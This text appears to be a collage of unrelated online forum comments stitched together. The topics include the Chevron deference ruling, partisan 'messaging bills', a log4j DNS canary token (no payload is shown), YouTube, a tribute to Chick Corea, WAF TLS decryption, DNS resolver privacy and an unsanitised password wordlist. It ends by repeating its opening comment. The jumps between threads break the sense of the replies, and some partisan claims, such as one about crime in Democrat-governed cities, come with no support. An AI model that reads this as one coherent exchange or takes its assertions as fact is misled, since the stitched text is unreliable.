>shift that determination from agency specialists to judges
All correct until this bit. They in fact want to shift it back to congress, who should do a better job in specifying what power they delegate to unelected heads of executive branch agencies.
> All correct until this bit. They in fact want to shift it back to congress,
That is one potential, down-the-road outcome of non-qualified judges being inserted into the process. Stalling oversight is the outcome that dominates all of it tho.
> congress, who should do a better job in specifying what power they delegate to unelected heads of executive branch agencies.
A law with every possible contingency can not be written. It's why Congress signals the desired outcomes the language of the law and expects qualified agency employees to bring those outcomes to fruition.
> The idea behind such deference is that expert agencies, accountable to an elected president, are better suited than federal judges to make the policy choices that Congress left open.
>At the time of the 1984 Chevron v. NRDC ruling, Doniger notes, it was widely perceived in legal and political circles that judges in the lower federal courts were inappropriately crafting policy by deciding for themselves what certain laws meant, effectively substituting their own ideas for the discernment of agency experts. “So the Supreme Court was basically saying to the lower courts: Stop inserting your own policy preferences under the guise of interpreting the law,” Doniger says.
> Now the Supreme Court could reopen the door for federal judges to decide how executive-branch agencies should go about their daily business whenever Congress has used ambiguous language
I don't know if you have been following politics recently but this sounds like a bad idea unless the idea is to kill the process (which is the desired outcome of the strategy). Theres no way congress can handle more of a workload nor should they be in charge of this - that should be in the bureaucracy not with the politicos.
This is just the first in a long list of "messaging" bills that will come from a very slim Republican House, because there is Democratic control of the Senate.
They know it won't become law. The point is to rile up the media, get hits on cable news, fund raise, and generally be useless as a governing body. This is what both parties do when they are out of power, and I would say is what they _prefer_ to do. It's easier than governing, makes them money, gets them media attention, etc.
Both parties here in the US _want_ to be minority parties so that they can behave this way and assume no actual responsibility for anything.
I really don't get this “both parties” attitude. There is no basis for that argument. There is a lot to criticize about Democrats, but they at least want to govern.
Democrats want to govern? Maybe you want to check the 10 bottom cities in America say by crime rate and poverty metrics. Name too 10 cities or even towns in USA and check which party doing the governing.
There is literally no way a Democrat controlled Senate even reads this bill.
To your point though, a good example of that kind of thing is the idiocy of Republican states who passed years of anti-abortion "trigger laws" in case Roe/Casey were ever overturned. They all assumed those precedence would never be overturned, and so they could be as extreme as they wanted.
Will voters barely making ends meet dealing with inflation prefer the party that doesnt send government agents to attack them while they are struggling?
Lots of mail gateways / mail security appliances do DNS lookups of URLs in the message body in order to check domain reputation and filter phishing links. It looks like he's using a DNS canary token which would be triggered by those as well.
Yep, see later in the thread for how I'm avoiding that now; basically it uses a second level of interpolation so that it will only expand to the token when log4j is expanding it:
>YouTube will never change and it will only get worse.
Private entities can be swayed by their customer's demands. Not saying that YT _will_ be swayed, just that this sort of creator outrage has a place in the market system, and "throwing a tantrum" over their bad behavior doesn't always have to be met with "private entities can do whatever they want!"
That actually sounds like a good test for monopoly status- do you have to worry about what your customers want/desire or are you so entrenched that you don’t care?
Chick has been my favorite since I began playing jazz in High School 20 years ago. Endlessly creative and a masterful player up until his last day. Since the pandemic started I've been watching him stream on IG and YT. He never lost a note and was always exploring new composers, techniques, and ways to expand his musical world. An absolute wonder and inspiration.
I never imagined that this story would be on the front page of HN. It's like seeing two of my worlds collide out of nowhere.
Some businesses have to run WAF products for regulatory compliance, which is typically implemented via TLS decryption at a WAF. There are ways to do TLS decryption with ephemeral keys but many orgs just use the easy way of just giving the WAF the RSA key.
>Running your own resolver will give the authoritative servers the ip address of the request, but does this leak any assets to any potential attacker? The owner behind the authoritative servers already get the web logs so what additional information is being leaked.
This is addressed in the panel. The argument is that there is some "privacy mixing" because owner of the authoritative server only sees a highly-trafficked resolver as the source, and not your home network resolver.
Yes, the authoritative server get less data from the DNS server but the owner of the domain already get the information from web server logs and similar sources. I do not see how dns mixing provide any privacy in any common threat model.
In the first case a client that request a webpage contact company X authoritative server with private information [IP ADDRESS], creating a record on the DNS server, and then visit company X web server creating a second record at the same company with the same [IP ADDRESS].
In the second case a client request a webpage of company X by contacting google, creating a record on google DNS server with [IP ADDRESS], and then visits company X and create a record there with [IP ADDRESS].
In one case one company has the data, and in the second case two companies has the data. It does not make any sense.
Tangential anecdote: I supported a product recently that had a password generator feature that admins could use to create a “random” password for a new user account. The password would be emailed to the user (the admin never saw it). The generator used a wordlist file that the developers must have grabbed from an online dictionary. It was about 10k words and contained MANY offensive ones. Pretty much any obscenity you could imagine and more. It was obvious no one had sanitized it.
I filed a bug a couple years ago but it still isn’t fixed. Luckily it’s a seldom used feature, and I haven’t seen anyone affected yet.
This seems like pure laziness. Did the developers really not have an understanding of basic PKI? Or did they realize late in the game that their local web socket was gonna require HTTPS and slap this on at the last minute?
All correct until this bit. They in fact want to shift it back to congress, who should do a better job in specifying what power they delegate to unelected heads of executive branch agencies.